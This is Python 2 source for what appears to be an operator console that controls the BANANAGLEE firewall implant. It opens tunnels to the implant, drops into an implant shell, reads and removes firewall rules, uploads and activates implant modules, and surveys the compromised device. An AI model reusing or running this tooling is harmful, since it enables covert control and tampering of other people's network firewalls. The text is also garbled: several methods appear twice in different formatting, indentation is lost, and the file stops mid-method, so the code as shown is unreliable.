def do_shell(self, module):
'''shell
drops user to a BANANAGLEE shell'''
self.logger.debug('user ran shell')
tunnel_number = tools.openTunnel(self.sfile, self.logger)
command = str(self.sfile['lp_bin']) + ' --lp ' + str(self.sfile['lp']) + ' --implant ' + str(self.sfile['implant']) + ' --idkey ' + str(self.sfile['idkey']) + ' --sport ' + str(self.sfile['sport']) + ' --dport ' + str(self.sfile['dport']) + ' --logdir ' + self.sfile['logs_to_process']
child = pexpect.spawn(command)
temp_counter = 0
found_file = False
#create log file and set up loagging
while found_file == False:
if os.path.isfile(os.path.join(self.sfile['log_dir'],self.sfile['hostname'] + '.' + self.sfile['target'] + 'BG_shell' + str(temp_counter) + '.log')) == True:
temp_counter += 1
else:
log_file = os.path.join(self.sfile['log_dir'],self.sfile['hostname'] + '.' + self.sfile['target'] + 'BG_shell' + str(temp_counter) + '.log')
found_file = True
logfile = file(log_file,'a')
child.logfile = logfile
try:
child.interact()
except:
self.logger.debug('user left shell')
tools.closeTunnel(self.sfile,tunnel_number,self.logger)
logfile.close()
return
def do_remove_rule(self, id):
'''remove_rule [ID]
removes the rule with ID'''
#Get the remove module handle
try:
handles = self.sfile['packetToolkit']
remove_handle = handles['PD_removeRuleHandler']
except:
self.logger.exception('could not get handle for removeRuleHandler')
self.logger.debug('remove the rule with ID of: ' + str(id))
#Check user input and then run the command
if id == '':
self.logger.error('you did not provide an ID')
return
elif id.isdigit() == False:
self.logger.error('you did not provide a valid number for ID')
return
else:
#update ports and open tunnel
tunnel_number = tools.openTunnel(self.sfile, self.logger)
command = str(self.sfile['miniprog']) + ' --arg "' + str(
id) + '" --name remove_rule --cmd ' + str(
remove_handle) + ' --bsize 512 --idkey ' + str(
self.sfile['idkey']) + ' --sport ' + str(
self.sfile['sport']) + ' --dport ' + str(
self.sfile['dport']) + ' --lp ' + str(
self.sfile['lp']) + ' --implant ' + str(
self.sfile['implant']
) + ' --logdir ' + str(
self.sfile['logs_to_process'])
remove = subprocess.Popen(shlex.split(command),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output_stdout = remove.stdout.read()
output_stderr = remove.stderr.read()
self.logger.debug('Remove rule command: ' + str(command))
self.logger.debug('Remove rule stdout: ' + str(output_stdout))
self.logger.debug('Remove rule stderr: ' + str(output_stderr))
#close tunnel
tools.closeTunnel(self.sfile, tunnel_number, self.logger)
#Parse output and display result to the user
for i in output_stderr.split('\r\n'):
if 'Rule NOT Removed, rule does not exist' in i:
self.logger.error(
'the ID that you provided did not exist on the firewall'
)
elif 'Rule Removed - Reply received' in i:
print 'Removed rule ' + str(id)
self.logger.info('removed rule')
else:
self.logger.error(
'some other output was recieved then what I expected')
def do_show_uploaded_modules(self, line):
'''show_uploaded_modules [connect]
returns the modules that are currently uploaded
if connect is used a connection to the firewall will be made'''
if line == '':
self.logger.info('modules that are currently loaded')
for mod in self.sfile['uploaded_mod_list']:
self.logger.info(str(mod))
elif line[0].lower() == 'c':
tunnel_number = tools.openTunnel(self.sfile, self.logger)
command = str(self.sfile['lp_bin']) + ' --lp ' + str(
self.sfile['lp']) + ' --implant ' + str(
self.sfile['implant']) + ' --idkey ' + str(
self.sfile['idkey']) + ' --sport ' + str(
self.sfile['sport']) + ' --dport ' + str(
self.sfile['dport']
) + ' --logdir ' + self.sfile['logs_to_process']
child = pexpect.spawn(command)
temp_counter = 0
found_file = False
while found_file == False:
if os.path.isfile(
os.path.join(
self.sfile['log_dir'], self.sfile['hostname'] +
'.' + self.sfile['target'] + 'BG_shell' +
str(temp_counter) + '.log')) == True:
temp_counter += 1
else:
log_file = os.path.join(
self.sfile['log_dir'],
self.sfile['hostname'] + '.' + self.sfile['target'] +
'BG_shell' + str(temp_counter) + '.log')
found_file = True
logfile = file(log_file, 'a')
child.logfile = logfile
try:
child.sendline('1')
child.expect('BG#', timeout=120)
child.sendline('36')
child.expect('BG#', timeout=180)
child.sendline('9')
child.expect('BG#', timeout=120)
child.sendline('0')
except:
self.logger.exception('Could not list out uploaded modules')
self.logger.info('uploaded modules')
for i in child.before.split('\r\n'):
self.logger.info(i)
tools.closeTunnel(self.sfile, tunnel_number, self.logger)
def do_get_rules(self, line):
'''get_rules
gets current rules on firewall'''
self.logger.info('getting current rules')
#Gets the get handle from the dict and run command
try:
handles = self.sfile['packetToolkit']
get_handle = handles['PD_getRulesHandler']
except:
self.logger.exception('could not get handle for getRulesHandler')
#open tunnel
tunnel_number = tools.openTunnel(self.sfile, self.logger)
command = str(self.sfile['miniprog']) + ' --lp ' + str(
self.sfile['lp']) + ' --implant ' + str(
self.sfile['implant']) + ' --idkey ' + str(
self.sfile['idkey']) + ' --sport ' + str(
self.sfile['sport']) + ' --dport ' + str(
self.sfile['dport']) + ' --logdir ' + str(
self.sfile['logs_to_process']
) + ' --name get_rules --cmd ' + str(get_handle)
rules = subprocess.Popen(shlex.split(command),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output_stdout = rules.stdout.read()
output_stderr = rules.stderr.read()
self.logger.debug('Get rules command: ' + str(command))
self.logger.debug('Get rules stdout: ' + str(output_stdout))
self.logger.debug('Get rules stderr: ' + str(output_stderr))
#close tunnel
tools.closeTunnel(self.sfile, tunnel_number, self.logger)
#Parse results and display to user
if 'No reply' in output_stderr:
self.logger.critical('could not talk to your tunnel module')
return
else:
rules = []
for i in output_stdout.split('\n'):
if 'ID' in i:
rules.append(i.split(': ')[-1])
self.logger.info('Current rules on firewall')
for i in rules:
self.logger.info(str(i))
self.sfile['rules'] = rules
def do_shell(self, module):
'''shell
drops user to a BANANAGLEE shell'''
self.logger.debug('user ran shell')
tunnel_number = tools.openTunnel(self.sfile, self.logger)
command = str(self.sfile['lp_bin']) + ' --lp ' + str(
self.sfile['lp']) + ' --implant ' + str(
self.sfile['implant']) + ' --idkey ' + str(
self.sfile['idkey']) + ' --sport ' + str(
self.sfile['sport']) + ' --dport ' + str(
self.sfile['dport']
) + ' --logdir ' + self.sfile['logs_to_process']
child = pexpect.spawn(command)
temp_counter = 0
found_file = False
#create log file and set up loagging
while found_file == False:
if os.path.isfile(
os.path.join(
self.sfile['log_dir'],
self.sfile['hostname'] + '.' + self.sfile['target'] +
'BG_shell' + str(temp_counter) + '.log')) == True:
temp_counter += 1
else:
log_file = os.path.join(
self.sfile['log_dir'],
self.sfile['hostname'] + '.' + self.sfile['target'] +
'BG_shell' + str(temp_counter) + '.log')
found_file = True
logfile = file(log_file, 'a')
child.logfile = logfile
try:
child.interact()
except:
self.logger.debug('user left shell')
tools.closeTunnel(self.sfile, tunnel_number, self.logger)
logfile.close()
return
def do_remove_rule(self, id):
'''remove_rule [ID]
removes the rule with ID'''
#Get the remove module handle
try:
handles = self.sfile['packetToolkit']
remove_handle = handles['PD_removeRuleHandler']
except:
self.logger.exception('could not get handle for removeRuleHandler')
self.logger.debug('remove the rule with ID of: ' + str(id))
#Check user input and then run the command
if id == '':
self.logger.error('you did not provide an ID')
return
elif id.isdigit() == False:
self.logger.error('you did not provide a valid number for ID')
return
else:
#update ports and open tunnel
tunnel_number = tools.openTunnel(self.sfile, self.logger)
command = str(self.sfile['miniprog']) + ' --arg "' + str(id) + '" --name remove_rule --cmd ' + str(remove_handle) + ' --bsize 512 --idkey ' + str(self.sfile['idkey']) + ' --sport ' + str(self.sfile['sport']) + ' --dport ' + str(self.sfile['dport']) + ' --lp ' + str(self.sfile['lp']) + ' --implant ' + str(self.sfile['implant']) + ' --logdir ' + str(self.sfile['logs_to_process'])
remove = subprocess.Popen(shlex.split(command),stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output_stdout = remove.stdout.read()
output_stderr = remove.stderr.read()
self.logger.debug('Remove rule command: ' + str(command))
self.logger.debug('Remove rule stdout: ' + str(output_stdout))
self.logger.debug('Remove rule stderr: ' + str(output_stderr))
#close tunnel
tools.closeTunnel(self.sfile,tunnel_number,self.logger)
#Parse output and display result to the user
for i in output_stderr.split('\r\n'):
if 'Rule NOT Removed, rule does not exist' in i:
self.logger.error('the ID that you provided did not exist on the firewall')
elif 'Rule Removed - Reply received' in i:
print 'Removed rule ' + str(id)
self.logger.info('removed rule')
else:
self.logger.error('some other output was recieved then what I expected')
def do_show_uploaded_modules(self, line):
'''show_uploaded_modules [connect]
returns the modules that are currently uploaded
if connect is used a connection to the firewall will be made'''
if line == '':
self.logger.info('modules that are currently loaded')
for mod in self.sfile['uploaded_mod_list']:
self.logger.info(str(mod))
elif line[0].lower() == 'c':
tunnel_number = tools.openTunnel(self.sfile, self.logger)
command = str(self.sfile['lp_bin']) + ' --lp ' + str(self.sfile['lp']) + ' --implant ' + str(self.sfile['implant']) + ' --idkey ' + str(self.sfile['idkey']) + ' --sport ' + str(self.sfile['sport']) + ' --dport ' + str(self.sfile['dport']) + ' --logdir ' + self.sfile['logs_to_process']
child = pexpect.spawn(command)
temp_counter = 0
found_file = False
while found_file == False:
if os.path.isfile(os.path.join(self.sfile['log_dir'],self.sfile['hostname'] + '.' + self.sfile['target'] + 'BG_shell' + str(temp_counter) + '.log')) == True:
temp_counter += 1
else:
log_file = os.path.join(self.sfile['log_dir'],self.sfile['hostname'] + '.' + self.sfile['target'] + 'BG_shell' + str(temp_counter) + '.log')
found_file = True
logfile = file(log_file,'a')
child.logfile = logfile
try:
child.sendline('1')
child.expect('BG#', timeout=120)
child.sendline('36')
child.expect('BG#', timeout=180)
child.sendline('9')
child.expect('BG#', timeout=120)
child.sendline('0')
except:
self.logger.exception('Could not list out uploaded modules')
self.logger.info('uploaded modules')
for i in child.before.split('\r\n'):
self.logger.info(i)
tools.closeTunnel(self.sfile,tunnel_number,self.logger)
def do_get_rules(self, line):
'''get_rules
gets current rules on firewall'''
self.logger.info('getting current rules')
#Gets the get handle from the dict and run command
try:
handles = self.sfile['packetToolkit']
get_handle = handles['PD_getRulesHandler']
except:
self.logger.exception('could not get handle for getRulesHandler')
#open tunnel
tunnel_number = tools.openTunnel(self.sfile, self.logger)
command = str(self.sfile['miniprog']) + ' --lp ' + str(self.sfile['lp']) + ' --implant ' + str(self.sfile['implant']) + ' --idkey ' + str(self.sfile['idkey']) + ' --sport ' + str(self.sfile['sport']) + ' --dport ' + str(self.sfile['dport']) + ' --logdir ' + str(self.sfile['logs_to_process']) + ' --name get_rules --cmd ' + str(get_handle)
rules = subprocess.Popen(shlex.split(command),stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output_stdout = rules.stdout.read()
output_stderr = rules.stderr.read()
self.logger.debug('Get rules command: ' + str(command))
self.logger.debug('Get rules stdout: ' + str(output_stdout))
self.logger.debug('Get rules stderr: ' + str(output_stderr))
#close tunnel
tools.closeTunnel(self.sfile,tunnel_number,self.logger)
#Parse results and display to user
if 'No reply' in output_stderr:
self.logger.critical('could not talk to your tunnel module')
return
else:
rules = []
for i in output_stdout.split('\n'):
if 'ID' in i:
rules.append(i.split(': ')[-1])
self.logger.info('Current rules on firewall')
for i in rules:
self.logger.info(str(i))
self.sfile['rules'] = rules
def do_load(self, module):
'''load [module]
uploads and activates a module'''
self.logger.debug('user ran load ' + str(module))
#check to make sure it is a valid module and get the number for that module
if module in self.sfile['mod_num_dict']:
module_number = self.sfile['mod_num_dict'][module]
else:
self.logger.error('selected an invalid module, the valid modules are:')
self.do_show_uploadable_modules(' ')
#check to make sure that module is not already uploaded
if module in self.sfile['uploaded_mod_list']:
self.logger.info('the module ' + str(module) + ' is already uploaded')
return
#check to see if user ran survey
if self.sfile['survey'] == False:
self.logger.error('survey had not been completed, please run survey')
return
#build command to run and spawn pexpect
tunnel_number = tools.openTunnel(self.sfile, self.logger)
command = str(self.sfile['lp_bin']) + ' --lp ' + str(self.sfile['lp']) + ' --implant ' + str(self.sfile['implant']) + ' --idkey ' + str(self.sfile['idkey']) + ' --sport ' + str(self.sfile['sport']) + ' --dport ' + str(self.sfile['dport']) + ' --logdir ' + self.sfile['logs_to_process']
child = pexpect.spawn(command)
temp_counter = 0
found_file = False
#create log file and set up loagging
while found_file == False:
if os.path.isfile(os.path.join(self.sfile['log_dir'],self.sfile['hostname'] + '.' + self.sfile['target'] + 'BG_upload_module' + str(temp_counter) + '.log')) == True:
temp_counter += 1
else:
log_file = os.path.join(self.sfile['log_dir'],self.sfile['hostname'] + '.' + self.sfile['target'] + 'BG_upload_module' + str(temp_counter) + '.log')
found_file = True
logfile = file(log_file,'a')
child.logfile = logfile
try:
#open session with the firewall
child.sendline('1')
#upload the selected module
child.expect('BG#', timeout=120)
child.sendline('31')
child.expect('# Select module', timeout=120)
child.sendline(str(module_number))
self.logger.debug('uploading ' + str(module) + ' with ID of: ' + str(module_number))
child.expect('BG#', timeout=300)
#check id number from config and activate module
id_num = self.tools_config.get('bananaglee' + self.sfile['version'], str(module) + '_ID')
child.sendline('32 ' + str(id_num))
self.logger.debug('activating the module with 32 ' + str(id_num))
#check to make sure module is uploaded
child.expect('BG#', timeout=120)
child.sendline('36')
child.expect('BG#', timeout=120)
#close session with the firewall
child.sendline('9')
child.expect('BG#', timeout=120)
child.sendline('0')
#close logfile
logfile.close()
except:
self.logger.exception('could not load the module : ' + str(module))
tools.closeTunnel(self.sfile,tunnel_number,self.logger)
#read in log file
with open(log_file,'r') as f:
output = f.readlines()
#build dict in be inserted in the mod_dict with the command handles returned
insert_dict = {}
for i in output:
if 'Command' in i:
self.logger.info(i.rstrip('\r\n'))
command_id = i[-6:].rstrip('\r\n')
command = i.split("'")[1]
insert_dict[command] = str(command_id)
#insert dict
self.sfile[module] = insert_dict
self.uploaded_mod_list.append(module)
self.sfile['uploaded_mod_list'] = self.uploaded_mod_list
def do_unload(self, module):
'''unload [module]
deactivates and removes a module'''
self.logger.debug('user ran unload ' + str(module))
if self.sfile['survey'] == False:
self.logger.error('survey had not been completed, please run survey')
return
if module in self.sfile['uploaded_mod_list']:
pass
else:
self.logger.error('module: ' + str(module) + ' is not an uploaded module')
self.logger.info('Current uploaded modules are: ')
if len(self.sfile['uploaded_mod_list']) == 0:
self.logger.info('I do not know of any uploaded modules')
else:
for i in self.sfile['uploaded_mod_list']:
self.logger.info(i)
return
command_id = self.tools_config.get('bananaglee' + str(self.sfile['version']), module + '_ID')
self.logger.debug('command id: ' + str(command_id))
self.logger.info('unloading the ' + str(module) + ' module')
tunnel_number = tools.openTunnel(self.sfile, self.logger)
command = str(self.sfile['lp_bin']) + ' --lp ' + str(self.sfile['lp']) + ' --implant ' + str(self.sfile['implant']) + ' --idkey ' + str(self.sfile['idkey']) + ' --sport ' + str(self.sfile['sport']) + ' --dport ' + str(self.sfile['dport']) + ' --logdir ' + str(self.sfile['logs_to_process'])
self.logger.debug(command)
temp_counter = 0
found_file = False
#create log file and set up loagging
while found_file == False:
if os.path.isfile(os.path.join(self.sfile['log_dir'],self.sfile['hostname'] + '.' + self.sfile['target'] + 'BG_shell' + str(temp_counter) + '.log')) == True:
temp_counter += 1
else:
log_file = os.path.join(self.sfile['log_dir'],self.sfile['hostname'] + '.' + self.sfile['target'] + 'BG_shell' + str(temp_counter) + '.log')
found_file = True
self.logger.debug('log file: ' + log_file)
child = pexpect.spawn(command)
logfile = file(log_file,'a')
child.logfile = logfile
''' ADD ERROR CHECKING '''
try:
child.sendline('1')
child.expect('BG#', timeout=120)
child.sendline('33 ' + str(command_id) + ' 34 ' + str(command_id))
child.expect('BG#', timeout=180)
child.sendline('36')
child.expect('BG#', timeout=120)
child.sendline('9')
child.expect('BG#', timeout=120)
child.sendline('0')
except:
self.logger.exception('unload ' + str(module) + ' failed')
#add parsing
tools.closeTunnel(self.sfile,tunnel_number,self.logger)
logfile.close()
#remove module from uploaded mod list
n = 0
tmp_list = self.sfile['uploaded_mod_list']
for i in tmp_list:
if i == module:
tmp_list.pop(n)
else:
n += 1
self.sfile['uploaded_mod_list'] = tmp_list
def do_survey(self, line):
'''survey - preforms a survey, interface info/config/arp'''
self.logger.debug('user ran survey')
self.logger.info('running survey')
#checks to make sure all parameters are defined
if tools.checks(self.sfile,self.logger) == False:
print tools.show_settings(self.sfile,' ')
self.logger.error('missing required parameters')
return False
tunnel_number = tools.openTunnel(self.sfile, self.logger)
command = str(self.sfile['lp_bin']) + ' --lp ' + str(self.sfile['lp']) + ' --implant ' + str(self.sfile['implant']) + ' --idkey ' + str(self.sfile['idkey']) + ' --sport ' + str(self.sfile['sport']) + ' --dport ' + str(self.sfile['dport']) + ' --logdir ' + self.sfile['logs_to_process']
self.logger.debug(str(command))
temp_counter = 0
found_file = False
while found_file == False:
if os.path.isfile(os.path.join(self.sfile['log_dir'],self.sfile['hostname'] + '.' + self.sfile['target'] + '_BG_survey_' + str(temp_counter) + '_firewall.log')) == True:
temp_counter += 1
else:
logfile = os.path.join(self.sfile['log_dir'],self.sfile['hostname'] + '.' + self.sfile['target'] + '_BG_survey_' + str(temp_counter) + '_firewall.log')
found_file = True
child = pexpect.spawn(command)
plogfile = file(logfile, 'a')
child.logfile = plogfile
self.logger.info('parsing results, please wait')
self.logger.info('You can check ' + str(logfile))
#what need to be run for survey
'''
Add error handling:
timeout issues
talking to wrong version
'''
try:
child.sendline('1')
child.expect('BG#', timeout=120)
child.sendline('10')
child.expect('BG#', timeout=120)
child.sendline('11')
child.expect('BG#', timeout=120)
child.sendline('12')
child.expect('BG#', timeout=120)
child.sendline('31')
child.sendline('q')
child.expect('BG#', timeout=120)
child.sendline('9')
child.expect('BG#', timeout=120)
child.sendline('0')
except:
self.logger.exception('survey failed out')
#read in results from survey and parse
#should i index log file?
with open(logfile,'r') as f:
output = f.readlines()
c = 0
mod_start = 0
uptime = 0
mod_list = 0
for i in output:
self.logger.debug(str(i.rstrip('\r\n')))
if 'Connection Established to Implant' in i:
implant_id = c
self.logger.debug('found implant id at ' + str(c))
self.logger.debug(str(i))
elif 'OS Version' in i:
os_version = c
self.logger.debug('found the os version at ' + str(c))
self.logger.debug(str(i))
elif 'Implant Version' in i:
implant_version = c
self.logger.debug('found the implant version at ' + str(c))
self.logger.debug(str(i))
elif 'Uptime' in i:
uptime = c
self.logger.debug('found the uptime at ' + str(c))
self.logger.debug(str(i))
elif 'Printing the interface info and security levels' in i:
int_start = c
self.logger.debug('found the start of the interface info at ' + str(c))
self.logger.debug(str(i))
elif 'Module Name Version' in i:
mod_start = c
self.logger.debug('found the start of module info at ' + str(c))
self.logger.debug(str(i))
elif '###################' in i:
mod_list_start = c + 4
self.logger.debug('found the start of the module list at ' + str(c+4))
self.logger.debug(i)
c += 1
int_end_tmp = 0
for i in output[int_start:int_start + 20]:
if 'BG#' in i:
int_end = int_end_tmp + int_start
self.logger.debug('found the end of the interface information at ' + str(int_end))
self.logger.debug(str(i))
else:
int_end_tmp += 1
if mod_start != 0:
mod_end_tmp = 0
for i in output[mod_start:mod_start + 20]:
if 'BG#' in i:
mod_end = mod_end_tmp + mod_start
self.logger.debug('found the end of the loaded modules at ' + str(mod_end))
self.logger.debug(str(i))
else:
mod_end_tmp += 1
if mod_list_start != 0:
mod_list_end_temp = 0
for i in output[mod_list_start:mod_list_start + 20]:
if '# Select' in i:
mod_list_end = mod_list_end_temp + mod_list_start
self.logger.debug('found the end of the module list at ' + str(mod_list_end))
self.logger.debug(str(i))
else:
mod_list_end_temp += 1
module_list = output[mod_list_start:mod_list_end]
#store list of avliable modules
#self.params_dict['modules'] = output[mod_list_start:mod_list_end+1]
uploaded_modlist_tmp = []
#print out parsed results
self.logger.info('Survey Information')
try:
self.logger.info(' Implant ID: ' + str(output[implant_id].split(' ')[4]).rstrip('\r\n'))
except:
self.logger.exception('could not determine the implant id')
try:
self.logger.info(output[os_version].rstrip('\r\n'))
except:
self.logger.exception('could not determine the OS')
try:
self.logger.info(output[implant_version].rstrip('\r\n'))
except:
self.logger.exception('could not determine the implant version')
try:
if uptime != 0:
self.logger.info(output[uptime].rstrip('\r\n'))
except:
self.logger.exception('could not determine the uptime')
try:
if mod_start != 0:
module_info = output[mod_start:mod_end]
end = False
for i in module_info[:-1]:
for j in i.split(' '):
if j in self.sfile['mod_num_dict']:
uploaded_modlist_tmp.append(j)
if 'BG#' in i:
end = True
if end == False:
self.logger.info(i.rstrip('\r\n'))
else:
self.logger.info('No modules are currently uploaded')
except:
self.logger.exception('could not get the module information')
try:
interface_info = output[int_start:int_end + 1]
interface_info_out = []
for i in interface_info:
self.logger.info(i.rstrip('\r\n'))
except:
self.logger.exception('could not get the interface information')
try:
#store in dictomary the modules with the number
mod_num_dict = {}
self.logger.info('List of modules that can be uploaded')
for i in module_list:
format = i.rstrip('\r\n')[1:]
mod_array = filter(None, format.split(' '))
if len(mod_array) == 3:
self.logger.info(mod_array[1])
number = mod_array[0]
mod_num_dict[mod_array[1]] = number[:-1]
self.logger.debug(mod_num_dict)
self.sfile['mod_num_dict'] = mod_num_dict
#set up dicts to store handle information
for i in mod_num_dict:
if self.sfile.has_key(i) == False:
self.sfile[i] = {}
except:
self.logger.exception('could not build module dictonary')
#get uploaded modules
self.sfile['uploaded_mod_list'] = uploaded_modlist_tmp
plogfile.close()
#set survey to true
self.sfile['survey'] = True
tools.closeTunnel(self.sfile,tunnel_number,self.logger)
def do_load(self, module):
'''load [module]
uploads and activates a module'''
self.logger.debug('user ran load ' + str(module))
#check to make sure it is a valid module and get the number for that module
if module in self.sfile['mod_num_dict']:
module_number = self.sfile['mod_num_dict'][module]
else:
self.logger.error(
'selected an invalid module, the valid modules are:')
self.do_show_uploadable_modules(' ')
#check to make sure that module is not already uploaded
if module in self.sfile['uploaded_mod_list']:
self.logger.info('the module ' + str(module) +
' is already uploaded')
return
#check to see if user ran survey
if self.sfile['survey'] == False:
self.logger.error(
'survey had not been completed, please run survey')
return
#build command to run and spawn pexpect
tunnel_number = tools.openTunnel(self.sfile, self.logger)
command = str(self.sfile['lp_bin']) + ' --lp ' + str(
self.sfile['lp']) + ' --implant ' + str(
self.sfile['implant']) + ' --idkey ' + str(
self.sfile['idkey']) + ' --sport ' + str(
self.sfile['sport']) + ' --dport ' + str(
self.sfile['dport']
) + ' --logdir ' + self.sfile['logs_to_process']
child = pexpect.spawn(command)
temp_counter = 0
found_file = False
#create log file and set up loagging
while found_file == False:
if os.path.isfile(
os.path.join(
self.sfile['log_dir'], self.sfile['hostname'] + '.' +
self.sfile['target'] + 'BG_upload_module' +
str(temp_counter) + '.log')) == True:
temp_counter += 1
else:
log_file = os.path.join(
self.sfile['log_dir'],
self.sfile['hostname'] + '.' + self.sfile['target'] +
'BG_upload_module' + str(temp_counter) + '.log')
found_file = True
logfile = file(log_file, 'a')
child.logfile = logfile
try:
#open session with the firewall
child.sendline('1')
#upload the selected module
child.expect('BG#', timeout=120)
child.sendline('31')
child.expect('# Select module', timeout=120)
child.sendline(str(module_number))
self.logger.debug('uploading ' + str(module) + ' with ID of: ' +
str(module_number))
child.expect('BG#', timeout=300)
#check id number from config and activate module
id_num = self.tools_config.get(
'bananaglee' + self.sfile['version'],
str(module) + '_ID')
child.sendline('32 ' + str(id_num))
self.logger.debug('activating the module with 32 ' + str(id_num))
#check to make sure module is uploaded
child.expect('BG#', timeout=120)
child.sendline('36')
child.expect('BG#', timeout=120)
#close session with the firewall
child.sendline('9')
child.expect('BG#', timeout=120)
child.sendline('0')
#close logfile
logfile.close()
except:
self.logger.exception('could not load the module : ' + str(module))
tools.closeTunnel(self.sfile, tunnel_number, self.logger)
#read in log file
with open(log_file, 'r') as f:
output = f.readlines()
#build dict in be inserted in the mod_dict with the command handles returned
insert_dict = {}
for i in output:
if 'Command' in i:
self.logger.info(i.rstrip('\r\n'))
command_id = i[-6:].rstrip('\r\n')
command = i.split("'")[1]
insert_dict[command] = str(command_id)
#insert dict
self.sfile[module] = insert_dict
self.uploaded_mod_list.append(module)
self.sfile['uploaded_mod_list'] = self.uploaded_mod_list
def do_unload(self, module):
'''unload [module]
deactivates and removes a module'''
self.logger.debug('user ran unload ' + str(module))
if self.sfile['survey'] == False:
self.logger.error(
'survey had not been completed, please run survey')
return
if module in self.sfile['uploaded_mod_list']:
pass
else:
self.logger.error('module: ' + str(module) +
' is not an uploaded module')
self.logger.info('Current uploaded modules are: ')
if len(self.sfile['uploaded_mod_list']) == 0:
self.logger.info('I do not know of any uploaded modules')
else:
for i in self.sfile['uploaded_mod_list']:
self.logger.info(i)
return
command_id = self.tools_config.get(
'bananaglee' + str(self.sfile['version']), module + '_ID')
self.logger.debug('command id: ' + str(command_id))
self.logger.info('unloading the ' + str(module) + ' module')
tunnel_number = tools.openTunnel(self.sfile, self.logger)
command = str(self.sfile['lp_bin']) + ' --lp ' + str(
self.sfile['lp']) + ' --implant ' + str(
self.sfile['implant']) + ' --idkey ' + str(
self.sfile['idkey']) + ' --sport ' + str(
self.sfile['sport']) + ' --dport ' + str(
self.sfile['dport']) + ' --logdir ' + str(
self.sfile['logs_to_process'])
self.logger.debug(command)
temp_counter = 0
found_file = False
#create log file and set up loagging
while found_file == False:
if os.path.isfile(
os.path.join(
self.sfile['log_dir'],
self.sfile['hostname'] + '.' + self.sfile['target'] +
'BG_shell' + str(temp_counter) + '.log')) == True:
temp_counter += 1
else:
log_file = os.path.join(
self.sfile['log_dir'],
self.sfile['hostname'] + '.' + self.sfile['target'] +
'BG_shell' + str(temp_counter) + '.log')
found_file = True
self.logger.debug('log file: ' + log_file)
child = pexpect.spawn(command)
logfile = file(log_file, 'a')
child.logfile = logfile
''' ADD ERROR CHECKING '''
try:
child.sendline('1')
child.expect('BG#', timeout=120)
child.sendline('33 ' + str(command_id) + ' 34 ' + str(command_id))
child.expect('BG#', timeout=180)
child.sendline('36')
child.expect('BG#', timeout=120)
child.sendline('9')
child.expect('BG#', timeout=120)
child.sendline('0')
except:
self.logger.exception('unload ' + str(module) + ' failed')
#add parsing
tools.closeTunnel(self.sfile, tunnel_number, self.logger)
logfile.close()
#remove module from uploaded mod list
n = 0
tmp_list = self.sfile['uploaded_mod_list']
for i in tmp_list:
if i == module:
tmp_list.pop(n)
else:
n += 1
self.sfile['uploaded_mod_list'] = tmp_list
def do_survey(self, line):
'''survey - preforms a survey, interface info/config/arp'''
self.logger.debug('user ran survey')
self.logger.info('running survey')
#checks to make sure all parameters are defined
if tools.checks(self.sfile, self.logger) == False:
print tools.show_settings(self.sfile, ' ')
self.logger.error('missing required parameters')
return False
tunnel_number = tools.openTunnel(self.sfile, self.logger)
command = str(self.sfile['lp_bin']) + ' --lp ' + str(
self.sfile['lp']) + ' --implant ' + str(
self.sfile['implant']) + ' --idkey ' + str(
self.sfile['idkey']) + ' --sport ' + str(
self.sfile['sport']) + ' --dport ' + str(
self.sfile['dport']
) + ' --logdir ' + self.sfile['logs_to_process']
self.logger.debug(str(command))
temp_counter = 0
found_file = False
while found_file == False:
if os.path.isfile(
os.path.join(
self.sfile['log_dir'], self.sfile['hostname'] + '.' +
self.sfile['target'] + '_BG_survey_' +
str(temp_counter) + '_firewall.log')) == True:
temp_counter += 1
else:
logfile = os.path.join(
self.sfile['log_dir'],
self.sfile['hostname'] + '.' + self.sfile['target'] +
'_BG_survey_' + str(temp_counter) + '_firewall.log')
found_file = True
child = pexpect.spawn(command)
plogfile = file(logfile, 'a')
child.logfile = plogfile
self.logger.info('parsing results, please wait')
self.logger.info('You can check ' + str(logfile))
#what need to be run for survey
'''
Add error handling:
timeout issues
talking to wrong version
'''
try:
child.sendline('1')
child.expect('BG#', timeout=120)
child.sendline('10')
child.expect('BG#', timeout=120)
child.sendline('11')
child.expect('BG#', timeout=120)
child.sendline('12')
child.expect('BG#', timeout=120)
child.sendline('31')
child.sendline('q')
child.expect('BG#', timeout=120)
child.sendline('9')
child.expect('BG#', timeout=120)
child.sendline('0')
except:
self.logger.exception('survey failed out')
#read in results from survey and parse
#should i index log file?
with open(logfile, 'r') as f:
output = f.readlines()
c = 0
mod_start = 0
uptime = 0
mod_list = 0
for i in output:
self.logger.debug(str(i.rstrip('\r\n')))
if 'Connection Established to Implant' in i:
implant_id = c
self.logger.debug('found implant id at ' + str(c))
self.logger.debug(str(i))
elif 'OS Version' in i:
os_version = c
self.logger.debug('found the os version at ' + str(c))
self.logger.debug(str(i))
elif 'Implant Version' in i:
implant_version = c
self.logger.debug('found the implant version at ' + str(c))
self.logger.debug(str(i))
elif 'Uptime' in i:
uptime = c
self.logger.debug('found the uptime at ' + str(c))
self.logger.debug(str(i))
elif 'Printing the interface info and security levels' in i:
int_start = c
self.logger.debug('found the start of the interface info at ' +
str(c))
self.logger.debug(str(i))
elif 'Module Name Version' in i:
mod_start = c
self.logger.debug('found the start of module info at ' +
str(c))
self.logger.debug(str(i))
elif '###################' in i:
mod_list_start = c + 4
self.logger.debug('found the start of the module list at ' +
str(c + 4))
self.logger.debug(i)
c += 1
int_end_tmp = 0
for i in output[int_start:int_start + 20]:
if 'BG#' in i:
int_end = int_end_tmp + int_start
self.logger.debug(
'found the end of the interface information at ' +
str(int_end))
self.logger.debug(str(i))
else:
int_end_tmp += 1
if mod_start != 0:
mod_end_tmp = 0
for i in output[mod_start:mod_start + 20]:
if 'BG#' in i:
mod_end = mod_end_tmp + mod_start
self.logger.debug(
'found the end of the loaded modules at ' +
str(mod_end))
self.logger.debug(str(i))
else:
mod_end_tmp += 1
if mod_list_start != 0:
mod_list_end_temp = 0
for i in output[mod_list_start:mod_list_start + 20]:
if '# Select' in i:
mod_list_end = mod_list_end_temp + mod_list_start
self.logger.debug('found the end of the module list at ' +
str(mod_list_end))
self.logger.debug(str(i))
else:
mod_list_end_temp += 1
module_list = output[mod_list_start:mod_list_end]
#store list of avliable modules
#self.params_dict['modules'] = output[mod_list_start:mod_list_end+1]
uploaded_modlist_tmp = []
#print out parsed results
self.logger.info('Survey Information')
try:
self.logger.info(
' Implant ID: ' +
str(output[implant_id].split(' ')[4]).rstrip('\r\n'))
except:
self.logger.exception('could not determine the implant id')
try:
